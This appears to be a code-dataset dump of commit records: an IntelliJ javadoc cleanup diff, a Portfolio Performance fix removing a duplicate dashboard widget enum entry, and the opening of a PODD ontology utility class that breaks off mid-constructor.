community,vvv1559/intellij-community,mglukhikh/intellij-community,suncycheng/intellij-community,signed/intellij-community,FHannes/intellij-community,semonte/intellij-community,apixandru/intellij-community,vvv1559/intellij-community,youdonghai/intellij-community,ibinti/intellij-community,youdonghai/intellij-community,idea4bsd/idea4bsd,vvv1559/intellij-community,da1z/intellij-community,da1z/intellij-community,idea4bsd/idea4bsd,FHannes/intellij-community,semonte/intellij-community,semonte/intellij-community,idea4bsd/idea4bsd,ThiagoGarciaAlves/intellij-community,semonte/intellij-community,suncycheng/intellij-community,suncycheng/intellij-community,ThiagoGarciaAlves/intellij-community,youdonghai/intellij-community,signed/intellij-community,youdonghai/intellij-community,signed/intellij-community,apixandru/intellij-community,mglukhikh/intellij-community,vvv1559/intellij-community,apixandru/intellij-community,youdonghai/intellij-community,suncycheng/intellij-community,xfournet/intellij-community,vvv1559/intellij-community,mglukhikh/intellij-community,allotria/intellij-community,FHannes/intellij-community,youdonghai/intellij-community,FHannes/intellij-community,suncycheng/intellij-community,youdonghai/intellij-community,youdonghai/intellij-community,idea4bsd/idea4bsd,asedunov/intellij-community,idea4bsd/idea4bsd,signed/intellij-community,apixandru/intellij-community,xfournet/intellij-community,FHannes/intellij-community,ibinti/intellij-community,apixandru/intellij-community,vvv1559/intellij-community,ThiagoGarciaAlves/intellij-community,suncycheng/intellij-community,signed/intellij-community,idea4bsd/idea4bsd,youdonghai/intellij-community,allotria/intellij-community,mglukhikh/intellij-community,xfournet/intellij-community,asedunov/intellij-community,apixandru/intellij-community,idea4bsd/idea4bsd,da1z/intellij-community,ibinti/intellij-community,ThiagoGarciaAlves/intellij-community,signed/intellij-community,mglukhikh/intellij-community,suncycheng/intellij-community,ibinti/intellij-community,xfournet/intellij-community,ibinti/intellij-community,idea4bsd/idea4bsd,suncycheng/intellij-community,vvv1559/intellij-community,youdonghai/intellij-community,ibinti/intellij-community,ThiagoGarciaAlves/intellij-community,apixandru/intellij-community,mglukhikh/intellij-community,vvv1559/intellij-community,da1z/intellij-community,FHannes/intellij-community,vvv1559/intellij-community,ThiagoGarciaAlves/intellij-community,FHannes/intellij-community,suncycheng/intellij-community,FHannes/intellij-community,semonte/intellij-community,allotria/intellij-community,vvv1559/intellij-community,mglukhikh/intellij-community,asedunov/intellij-community,mglukhikh/intellij-community,youdonghai/intellij-community,apixandru/intellij-community,apixandru/intellij-community,youdonghai/intellij-community,asedunov/intellij-community,FHannes/intellij-community,vvv1559/intellij-community,allotria/intellij-community,mglukhikh/intellij-community,xfournet/intellij-community,vvv1559/intellij-community,asedunov/intellij-community,da1z/intellij-community,suncycheng/intellij-community,idea4bsd/idea4bsd,signed/intellij-community,FHannes/intellij-community,apixandru/intellij-community,apixandru/intellij-community,asedunov/intellij-community,ibinti/intellij-community,FHannes/intellij-community,apixandru/intellij-community,da1z/intellij-community,asedunov/intellij-community,signed/intellij-community,xfournet/intellij-community,ThiagoGarciaAlves/intellij-community,allotria/intellij-community,vvv1559/intellij-community,allotria/intellij-community,da1z/intellij-community,signed/intellij-community,semonte/intellij-community,suncycheng/intellij-community,xfournet/intellij-community,mglukhikh/intellij-community,da1z/intellij-community,semonte/intellij-community
/* * Copyright 2000-2015 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.openapi.components; import org.jetbrains.annotations.Nullable; /** * Every component which would like to persist its state across IDEA restarts * should implement this interface. * * See <a href="http://www.jetbrains.org/intellij/sdk/docs/basics/persisting_state_of_components.html">IntelliJ Platform SDK DevGuide</a> * for detailed description. * * In general, implementation should be thread-safe, because "loadState" is called from the same thread where component is initialized. * If component used only from one thread (e.g. EDT), thread-safe implementation is not required. */ public interface PersistentStateComponent<T> { /** * @return a component state. All properties, public and annotated fields are serialized. Only values, which differ * from default (i.e. the value of newly instantiated class) are serialized. <code>null</code> value indicates * that the returned state won't be stored, as a result previously stored state will be used. * @see com.intellij.util.xmlb.XmlSerializer */ @Nullable T getState(); /** * This method is called when new component state is loaded. The method can and will be called several times, if * config files were externally changed while IDEA running. * @param state loaded component state * @see com.intellij.util.xmlb.XmlSerializerUtil#copyBean(Object, Object) */ void loadState(T state); }
platform/core-api/src/com/intellij/openapi/components/PersistentStateComponent.java
/* * Copyright 2000-2015 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.openapi.components; import org.jetbrains.annotations.Nullable; /** * Every component which would like to persist its state across IDEA restarts * should implement this interface. * * See <a href="http://www.jetbrains.org/intellij/sdk/docs/basics/persisting_state_of_components.html">IntelliJ Platform SDK DevGuide</a> * for detailed description. * * In general, implementation should be thread-safe, because "loadState" is called from the same thread where component is initialized. * If component used only from one thread (e.g. EDT), thread-safe implementation is not required. */ public interface PersistentStateComponent<T> { /** * @return a component state. All properties, public and annotated fields are serialized. Only values, which differ * from default (i.e. the value of newly instantiated class) are serialized. <code>null</code> value indicates * that no state should be stored. * @see com.intellij.util.xmlb.XmlSerializer */ @Nullable T getState(); /** * This method is called when new component state is loaded. The method can and will be called several times, if * config files were externally changed while IDEA running. * @param state loaded component state * @see com.intellij.util.xmlb.XmlSerializerUtil#copyBean(Object, Object) */ void loadState(T state); }
cleanup javadoc for PersistentStateComponent.getState (context: IDEA-CR-6770)
platform/core-api/src/com/intellij/openapi/components/PersistentStateComponent.java
cleanup javadoc for PersistentStateComponent.getState (context: IDEA-CR-6770)
<ide><path>latform/core-api/src/com/intellij/openapi/components/PersistentStateComponent.java <ide> /** <ide> * @return a component state. All properties, public and annotated fields are serialized. Only values, which differ <ide> * from default (i.e. the value of newly instantiated class) are serialized. <code>null</code> value indicates <del> * that no state should be stored. <add> * that the returned state won't be stored, as a result previously stored state will be used. <ide> * @see com.intellij.util.xmlb.XmlSerializer <ide> */ <ide> @Nullable
Java
epl-1.0
c0520813115fb99265f5a609c657e1d9218138ea
0
buchen/portfolio,buchen/portfolio,sebasbaumh/portfolio,buchen/portfolio,sebasbaumh/portfolio,sebasbaumh/portfolio,buchen/portfolio,sebasbaumh/portfolio
package name.abuchen.portfolio.ui.views.dashboard; import java.text.MessageFormat; import java.time.ZoneId; import java.time.format.DateTimeFormatter; import java.time.format.FormatStyle; import java.util.OptionalDouble; import java.util.function.BiFunction; import java.util.stream.LongStream; import name.abuchen.portfolio.math.Risk.Drawdown; import name.abuchen.portfolio.math.Risk.Volatility; import name.abuchen.portfolio.model.Dashboard; import name.abuchen.portfolio.money.Money; import name.abuchen.portfolio.money.Values; import name.abuchen.portfolio.snapshot.PerformanceIndex; import name.abuchen.portfolio.ui.Messages; import name.abuchen.portfolio.ui.views.dashboard.heatmap.EarningsHeatmapWidget; import name.abuchen.portfolio.ui.views.dashboard.heatmap.InvestmentHeatmapWidget; import name.abuchen.portfolio.ui.views.dashboard.heatmap.PerformanceHeatmapWidget; import name.abuchen.portfolio.ui.views.dashboard.heatmap.YearlyPerformanceHeatmapWidget; import name.abuchen.portfolio.ui.views.dataseries.DataSeries; public enum WidgetFactory { HEADING(Messages.LabelHeading, Messages.LabelCommon, HeadingWidget::new), TOTAL_SUM(Messages.LabelTotalSum, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); int length = index.getTotals().length; return index.getTotals()[length - 1]; }) // .withBenchmarkDataSeries(false) // .build()), TTWROR(Messages.LabelTTWROR, Messages.ClientEditorLabelPerformance, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getFinalAccumulatedPercentage(); }).build()), IRR(Messages.LabelIRR, Messages.ClientEditorLabelPerformance, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> data.calculate(ds, period).getPerformanceIRR()) // .withBenchmarkDataSeries(false) // .build()), ABSOLUTE_CHANGE(Messages.LabelAbsoluteChange, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); int length = index.getTotals().length; return index.getTotals()[length - 1] - index.getTotals()[0]; }) // .withBenchmarkDataSeries(false) // .build()), DELTA(Messages.LabelDelta, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateDelta(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), ABSOLUTE_DELTA(Messages.LabelAbsoluteDelta, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateAbsoluteDelta(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), INVESTED_CAPITAL(Messages.LabelInvestedCapital, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateInvestedCapital(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), ABSOLUTE_INVESTED_CAPITAL(Messages.LabelAbsoluteInvestedCapital, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateAbsoluteInvestedCapital(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), MAXDRAWDOWN(Messages.LabelMaxDrawdown, Messages.LabelRiskIndicators, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getDrawdown().getMaxDrawdown(); }) // .withTooltip((ds, period) -> { DateTimeFormatter formatter = DateTimeFormatter .ofLocalizedDate(FormatStyle.LONG) .withZone(ZoneId.systemDefault()); PerformanceIndex index = data.calculate(ds, period); Drawdown drawdown = index.getDrawdown(); return MessageFormat.format(Messages.TooltipMaxDrawdown, formatter.format( drawdown.getIntervalOfMaxDrawdown().getStart()), formatter.format(drawdown.getIntervalOfMaxDrawdown().getEnd())); }) // .withColoredValues(false) // .build()), MAXDRAWDOWNDURATION(Messages.LabelMaxDrawdownDuration, Messages.LabelRiskIndicators, MaxDrawdownDurationWidget::new), VOLATILITY(Messages.LabelVolatility, Messages.LabelRiskIndicators, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getVolatility().getStandardDeviation(); }) // .withTooltip((ds, period) -> Messages.TooltipVolatility) // .withColoredValues(false) // .build()), SEMIVOLATILITY(Messages.LabelSemiVolatility, Messages.LabelRiskIndicators, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getVolatility().getSemiDeviation(); }) // .withTooltip((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); Volatility vola = index.getVolatility(); return MessageFormat.format(Messages.TooltipSemiVolatility, Values.Percent5.format(vola.getExpectedSemiDeviation()), vola.getNormalizedSemiDeviationComparison(), Values.Percent5.format(vola.getStandardDeviation()), Values.Percent5.format(vola.getSemiDeviation())); }) // .withColoredValues(false) // .build()), CALCULATION(Messages.LabelPerformanceCalculation, Messages.ClientEditorLabelPerformance, PerformanceCalculationWidget::new), CHART(Messages.LabelPerformanceChart, Messages.ClientEditorLabelPerformance, (widget, data) -> new ChartWidget(widget, data, DataSeries.UseCase.PERFORMANCE)), ASSET_CHART(Messages.LabelAssetChart, Messages.LabelStatementOfAssets, (widget, data) -> new ChartWidget(widget, data, DataSeries.UseCase.STATEMENT_OF_ASSETS)), HEATMAP(Messages.LabelHeatmap, Messages.ClientEditorLabelPerformance, PerformanceHeatmapWidget::new), HEATMAP_YEARLY(Messages.LabelYearlyHeatmap, Messages.ClientEditorLabelPerformance, YearlyPerformanceHeatmapWidget::new), HEATMAP_EARNINGS(Messages.LabelHeatmapEarnings, Messages.LabelEarnings, EarningsHeatmapWidget::new), TRADES_BASIC_STATISTICS(Messages.LabelTradesBasicStatistics, Messages.LabelTrades, TradesWidget::new), TRADES_PROFIT_LOSS(Messages.LabelTradesProfitLoss, Messages.LabelTrades, TradesProfitLossWidget::new), TRADES_AVERAGE_HOLDING_PERIOD(Messages.LabelAverageHoldingPeriod, Messages.LabelTrades, TradesAverageHoldingPeriodWidget::new), TRADES_TURNOVER_RATIO(Messages.LabelTradesTurnoverRate, Messages.LabelTrades, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); OptionalDouble average = LongStream.of(index.getTotals()).average(); if (!average.isPresent() || average.getAsDouble() <= 0) return 0.0; long buy = LongStream.of(index.getBuys()).sum(); long sell = LongStream.of(index.getSells()).sum(); return Long.min(buy, sell) / average.getAsDouble(); }) // .withTooltip((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); String currency = data.getCurrencyConverter().getTermCurrency(); OptionalDouble average = LongStream.of(index.getTotals()).average(); long buy = LongStream.of(index.getBuys()).sum(); long sell = LongStream.of(index.getSells()).sum(); return MessageFormat.format(Messages.TooltipTurnoverRate, Values.Money.format(Money.of(currency, buy)), Values.Money.format(Money.of(currency, sell)), Values.Money.format(Money.of(currency, (long)average.orElse(0))), Values.Percent2.format(average.isPresent() && average.getAsDouble() > 0 ? Long.min(buy, sell) / average.getAsDouble() : 0)); }) // .withColoredValues(false) .build()), HEATMAP_INVESTMENTS(Messages.LabelHeatmapInvestments, Messages.LabelTrades, InvestmentHeatmapWidget::new), CURRENT_DATE(Messages.LabelCurrentDate, Messages.LabelCommon, CurrentDateWidget::new), EXCHANGE_RATE(Messages.LabelExchangeRate, Messages.LabelCommon, ExchangeRateWidget::new), ACTIVITY_CHART(Messages.LabelTradingActivityChart, Messages.LabelCommon, ActivityWidget::new), // typo is API now!! VERTICAL_SPACEER(Messages.LabelVerticalSpacer, Messages.LabelCommon, VerticalSpacerWidget::new); private String label; private String group; private BiFunction<Dashboard.Widget, DashboardData, WidgetDelegate<?>> createFunction; private WidgetFactory(String label, String group, BiFunction<Dashboard.Widget, DashboardData, WidgetDelegate<?>> createFunction) { this.label = label; this.group = group; this.createFunction = createFunction; } public String getLabel() { return label; } public String getGroup() { return group; } public WidgetDelegate<?> create(Dashboard.Widget widget, DashboardData data) { return this.createFunction.apply(widget, data); } }
name.abuchen.portfolio.ui/src/name/abuchen/portfolio/ui/views/dashboard/WidgetFactory.java
package name.abuchen.portfolio.ui.views.dashboard; import java.text.MessageFormat; import java.time.ZoneId; import java.time.format.DateTimeFormatter; import java.time.format.FormatStyle; import java.util.OptionalDouble; import java.util.function.BiFunction; import java.util.stream.LongStream; import name.abuchen.portfolio.math.Risk.Drawdown; import name.abuchen.portfolio.math.Risk.Volatility; import name.abuchen.portfolio.model.Dashboard; import name.abuchen.portfolio.money.Money; import name.abuchen.portfolio.money.Values; import name.abuchen.portfolio.snapshot.PerformanceIndex; import name.abuchen.portfolio.ui.Messages; import name.abuchen.portfolio.ui.views.dashboard.heatmap.EarningsHeatmapWidget; import name.abuchen.portfolio.ui.views.dashboard.heatmap.InvestmentHeatmapWidget; import name.abuchen.portfolio.ui.views.dashboard.heatmap.PerformanceHeatmapWidget; import name.abuchen.portfolio.ui.views.dashboard.heatmap.YearlyPerformanceHeatmapWidget; import name.abuchen.portfolio.ui.views.dataseries.DataSeries; public enum WidgetFactory { HEADING(Messages.LabelHeading, Messages.LabelCommon, HeadingWidget::new), TOTAL_SUM(Messages.LabelTotalSum, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); int length = index.getTotals().length; return index.getTotals()[length - 1]; }) // .withBenchmarkDataSeries(false) // .build()), TTWROR(Messages.LabelTTWROR, Messages.ClientEditorLabelPerformance, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getFinalAccumulatedPercentage(); }).build()), IRR(Messages.LabelIRR, Messages.ClientEditorLabelPerformance, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> data.calculate(ds, period).getPerformanceIRR()) // .withBenchmarkDataSeries(false) // .build()), ABSOLUTE_CHANGE(Messages.LabelAbsoluteChange, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); int length = index.getTotals().length; return index.getTotals()[length - 1] - index.getTotals()[0]; }) // .withBenchmarkDataSeries(false) // .build()), DELTA(Messages.LabelDelta, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateDelta(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), ABSOLUTE_DELTA(Messages.LabelAbsoluteDelta, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateAbsoluteDelta(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), INVESTED_CAPITAL(Messages.LabelInvestedCapital, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateInvestedCapital(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), ABSOLUTE_INVESTED_CAPITAL(Messages.LabelAbsoluteInvestedCapital, Messages.LabelStatementOfAssets, // (widget, data) -> IndicatorWidget.<Long>create(widget, data) // .with(Values.Amount) // .with((ds, period) -> { long[] d = data.calculate(ds, period).calculateAbsoluteInvestedCapital(); return d.length > 0 ? d[d.length - 1] : 0L; }) // .withBenchmarkDataSeries(false) // .build()), MAXDRAWDOWN(Messages.LabelMaxDrawdown, Messages.LabelRiskIndicators, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getDrawdown().getMaxDrawdown(); }) // .withTooltip((ds, period) -> { DateTimeFormatter formatter = DateTimeFormatter .ofLocalizedDate(FormatStyle.LONG) .withZone(ZoneId.systemDefault()); PerformanceIndex index = data.calculate(ds, period); Drawdown drawdown = index.getDrawdown(); return MessageFormat.format(Messages.TooltipMaxDrawdown, formatter.format( drawdown.getIntervalOfMaxDrawdown().getStart()), formatter.format(drawdown.getIntervalOfMaxDrawdown().getEnd())); }) // .withColoredValues(false) // .build()), MAXDRAWDOWNDURATION(Messages.LabelMaxDrawdownDuration, Messages.LabelRiskIndicators, MaxDrawdownDurationWidget::new), VOLATILITY(Messages.LabelVolatility, Messages.LabelRiskIndicators, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getVolatility().getStandardDeviation(); }) // .withTooltip((ds, period) -> Messages.TooltipVolatility) // .withColoredValues(false) // .build()), SEMIVOLATILITY(Messages.LabelSemiVolatility, Messages.LabelRiskIndicators, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); return index.getVolatility().getSemiDeviation(); }) // .withTooltip((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); Volatility vola = index.getVolatility(); return MessageFormat.format(Messages.TooltipSemiVolatility, Values.Percent5.format(vola.getExpectedSemiDeviation()), vola.getNormalizedSemiDeviationComparison(), Values.Percent5.format(vola.getStandardDeviation()), Values.Percent5.format(vola.getSemiDeviation())); }) // .withColoredValues(false) // .build()), CALCULATION(Messages.LabelPerformanceCalculation, Messages.ClientEditorLabelPerformance, PerformanceCalculationWidget::new), CHART(Messages.LabelPerformanceChart, Messages.ClientEditorLabelPerformance, (widget, data) -> new ChartWidget(widget, data, DataSeries.UseCase.PERFORMANCE)), ASSET_CHART(Messages.LabelAssetChart, Messages.LabelStatementOfAssets, (widget, data) -> new ChartWidget(widget, data, DataSeries.UseCase.STATEMENT_OF_ASSETS)), HEATMAP(Messages.LabelHeatmap, Messages.ClientEditorLabelPerformance, PerformanceHeatmapWidget::new), HEATMAP_YEARLY(Messages.LabelYearlyHeatmap, Messages.ClientEditorLabelPerformance, YearlyPerformanceHeatmapWidget::new), HEATMAP_EARNINGS(Messages.LabelHeatmapEarnings, Messages.LabelEarnings, EarningsHeatmapWidget::new), HEATMAP_INVESTMENTS(Messages.LabelHeatmapInvestments, Messages.LabelTrades, InvestmentHeatmapWidget::new), TRADES_BASIC_STATISTICS(Messages.LabelTradesBasicStatistics, Messages.LabelTrades, TradesWidget::new), TRADES_PROFIT_LOSS(Messages.LabelTradesProfitLoss, Messages.LabelTrades, TradesProfitLossWidget::new), TRADES_AVERAGE_HOLDING_PERIOD(Messages.LabelAverageHoldingPeriod, Messages.LabelTrades, TradesAverageHoldingPeriodWidget::new), TRADES_TURNOVER_RATIO(Messages.LabelTradesTurnoverRate, Messages.LabelTrades, // (widget, data) -> IndicatorWidget.<Double>create(widget, data) // .with(Values.Percent2) // .with((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); OptionalDouble average = LongStream.of(index.getTotals()).average(); if (!average.isPresent() || average.getAsDouble() <= 0) return 0.0; long buy = LongStream.of(index.getBuys()).sum(); long sell = LongStream.of(index.getSells()).sum(); return Long.min(buy, sell) / average.getAsDouble(); }) // .withTooltip((ds, period) -> { PerformanceIndex index = data.calculate(ds, period); String currency = data.getCurrencyConverter().getTermCurrency(); OptionalDouble average = LongStream.of(index.getTotals()).average(); long buy = LongStream.of(index.getBuys()).sum(); long sell = LongStream.of(index.getSells()).sum(); return MessageFormat.format(Messages.TooltipTurnoverRate, Values.Money.format(Money.of(currency, buy)), Values.Money.format(Money.of(currency, sell)), Values.Money.format(Money.of(currency, (long)average.orElse(0))), Values.Percent2.format(average.isPresent() && average.getAsDouble() > 0 ? Long.min(buy, sell) / average.getAsDouble() : 0)); }) // .withColoredValues(false) .build()), HEATMAP_INVESTMENTS(Messages.LabelHeatmapInvestments, Messages.LabelTrades, InvestmentHeatmapWidget::new), CURRENT_DATE(Messages.LabelCurrentDate, Messages.LabelCommon, CurrentDateWidget::new), EXCHANGE_RATE(Messages.LabelExchangeRate, Messages.LabelCommon, ExchangeRateWidget::new), ACTIVITY_CHART(Messages.LabelTradingActivityChart, Messages.LabelCommon, ActivityWidget::new), // typo is API now!! VERTICAL_SPACEER(Messages.LabelVerticalSpacer, Messages.LabelCommon, VerticalSpacerWidget::new); private String label; private String group; private BiFunction<Dashboard.Widget, DashboardData, WidgetDelegate<?>> createFunction; private WidgetFactory(String label, String group, BiFunction<Dashboard.Widget, DashboardData, WidgetDelegate<?>> createFunction) { this.label = label; this.group = group; this.createFunction = createFunction; } public String getLabel() { return label; } public String getGroup() { return group; } public WidgetDelegate<?> create(Dashboard.Widget widget, DashboardData data) { return this.createFunction.apply(widget, data); } }
Fixed duplicate entry in widget factory enum Issue: #2200
name.abuchen.portfolio.ui/src/name/abuchen/portfolio/ui/views/dashboard/WidgetFactory.java
Fixed duplicate entry in widget factory enum
<ide><path>ame.abuchen.portfolio.ui/src/name/abuchen/portfolio/ui/views/dashboard/WidgetFactory.java <ide> YearlyPerformanceHeatmapWidget::new), <ide> <ide> HEATMAP_EARNINGS(Messages.LabelHeatmapEarnings, Messages.LabelEarnings, EarningsHeatmapWidget::new), <del> <del> HEATMAP_INVESTMENTS(Messages.LabelHeatmapInvestments, Messages.LabelTrades, InvestmentHeatmapWidget::new), <ide> <ide> TRADES_BASIC_STATISTICS(Messages.LabelTradesBasicStatistics, Messages.LabelTrades, TradesWidget::new), <ide>
Java
agpl-3.0
4d57818771c3fa773fa250dda8a8e4d34ac6395d
0
podd/podd-redesign,podd/podd-redesign,podd/podd-redesign,podd/podd-redesign
/** * */ package com.github.podd.prototype; import java.io.IOException; import org.junit.Assert; import org.openrdf.model.Resource; import org.openrdf.model.URI; import org.openrdf.model.impl.ValueFactoryImpl; import org.openrdf.model.vocabulary.OWL; import org.openrdf.model.vocabulary.RDF; import org.openrdf.repository.RepositoryConnection; import org.openrdf.repository.RepositoryException; import org.openrdf.repository.util.RDFInserter; import org.semanticweb.owlapi.formats.RDFXMLOntologyFormatFactory; import org.semanticweb.owlapi.io.StreamDocumentSource; import org.semanticweb.owlapi.model.IRI; import org.semanticweb.owlapi.model.OWLOntology; import org.semanticweb.owlapi.model.OWLOntologyChangeException; import org.semanticweb.owlapi.model.OWLOntologyCreationException; import org.semanticweb.owlapi.model.OWLOntologyID; import org.semanticweb.owlapi.model.OWLOntologyManager; import org.semanticweb.owlapi.model.SetOntologyID; import org.semanticweb.owlapi.profiles.OWLProfile; import org.semanticweb.owlapi.profiles.OWLProfileRegistry; import org.semanticweb.owlapi.profiles.OWLProfileReport; import org.semanticweb.owlapi.reasoner.InconsistentOntologyException; import org.semanticweb.owlapi.reasoner.InferenceType; import org.semanticweb.owlapi.reasoner.OWLReasoner; import org.semanticweb.owlapi.reasoner.OWLReasonerFactory; import org.semanticweb.owlapi.reasoner.ReasonerInterruptedException; import org.semanticweb.owlapi.reasoner.TimeOutException; import org.semanticweb.owlapi.rio.RioMemoryTripleSource; import org.semanticweb.owlapi.rio.RioRenderer; import org.semanticweb.owlapi.util.InferredOntologyGenerator; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * A selection of utilities used to create the prototype. * * @author Peter Ansell [email protected] * */ public class PoddPrototypeUtils { /** * This URI is not currently in the Sesame OWL namespace, so we create a constant here as it is * vital to our strategy. */ public static final URI OWL_VERSION_IRI = ValueFactoryImpl.getInstance().createURI(OWL.NAMESPACE, "versionIRI"); /** * The OMV vocabulary defines a property for the current version of an ontology, so we are * reusing it here. */ public static final URI OMV_CURRENT_VERSION = ValueFactoryImpl.getInstance().createURI( "http://omv.ontoware.org/ontology#", "currentVersion"); /** * Creating a property for PODD to track the currentInferredVersion for the inferred axioms * ontology when linking from the ontology IRI. */ public static final URI PODD_BASE_CURRENT_INFERRED_VERSION = ValueFactoryImpl.getInstance().createURI( "http://purl.org/podd/ns/poddBase#", "currentInferredVersion"); /** * Creating a property for PODD to track the inferredVersion for the inferred axioms ontology of * a particular versioned ontology. */ public static final URI PODD_BASE_INFERRED_VERSION = ValueFactoryImpl.getInstance().createURI( "http://purl.org/podd/ns/poddBase#", "inferredVersion"); /** * An arbitrary prefix to use for automatically assigning ontology IRIs to inferred ontologies. * There are no versions delegated to inferred ontologies, and the ontology IRI is generated * using the version IRI of the original ontology, which must be unique. */ private static final String INFERRED_PREFIX = "urn:podd:inferred:ontologyiriprefix:"; private final Logger log = LoggerFactory.getLogger(this.getClass()); /** * The manager that will be used to manage the Schema Ontologies. * * TODO: Decide how to manage PODD Artifact ontologies that will typically have smaller * lifetimes than Schema Ontologies which will stay in the manager for the lifetime of the * manager, until the next shutdown or maintenance period when they may be changed. PODD * Artifact ontologies may import Schema Ontologies so their manager needs to be able to access * the list of Schema Ontologies. However, PODD Artifact ontologies must not stay in the manager * for long periods of time or they will cause unsustainable memory growth, particularly for * large ontologies with many versions. * * TODO: How does an edit conflict resolution strategy work in relation to this manager. * Ideally, we should also only be storing the latest version of a PODD Artifact in the manager. * If we are performing edit conflict resolution based solely on RDF triples and not OWL Axioms, * then we may be able to perform the diff externally. See the Protege OWL Diff code for * examples of how to diff ontologies. */ private OWLOntologyManager manager; /** * A factory for producing reasoners that are suitable according to owlProfile. */ private OWLReasonerFactory reasonerFactory; /** * The graph used to manage Schema Ontologies. This is distinct from the graph used to manage * PODD Artifacts. */ private URI schemaGraph; /** * The graph used to manage PODD Artifacts. This is distinct from the graph used to manage * Schema Ontologies. */ private URI artifactGraph; /** * The OWLProfile that matches the reasoners produced by the reasonerFactory. This enables a * faster pre-reasoner check to very that the ontology is in the profile before attempting to * reason over the entire ontology. */ private IRI owlProfile; /** * * @param nextManager * The OWLOntologyManager instance that will be used to store ontologies in memory. * @param nextOwlProfile * The IRI of the OWL Profile that matches the reasoner factory, and will be used to * check for basic consistency before using the reasoner. * @param nextReasonerFactory * The reasoner factory that will be used to create reasoners for consistency checks * and for inferring extra triples. * @param nextSchemaGraph * The Graph URI that will be used for storing the schema ontology management * statements. * @param nextPoddArtifactGraph * TODO * */ public PoddPrototypeUtils(final OWLOntologyManager nextManager, final IRI nextOwlProfile, final OWLReasonerFactory nextReasonerFactory, final URI nextSchemaGraph, final URI 